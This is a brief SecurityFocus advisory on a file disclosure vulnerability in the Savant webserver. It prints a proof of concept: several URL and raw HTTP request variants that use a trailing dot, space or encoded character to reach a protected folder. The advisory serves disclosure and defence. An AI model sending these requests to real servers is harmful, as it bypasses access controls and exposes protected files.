Savant Webserver File Disclosure Vulnerability

No exploit required.

The following proof of concept has been supplied by Auriemma Luigi of PivX Solutions:

http://host/password_folder.
"GET /password_folder / HTTP/1.0" <-- use with telnet
http://host/password_folder%2e
http://host/password_folder%20


 

Privacy Statement
Copyright 2010, SecurityFocus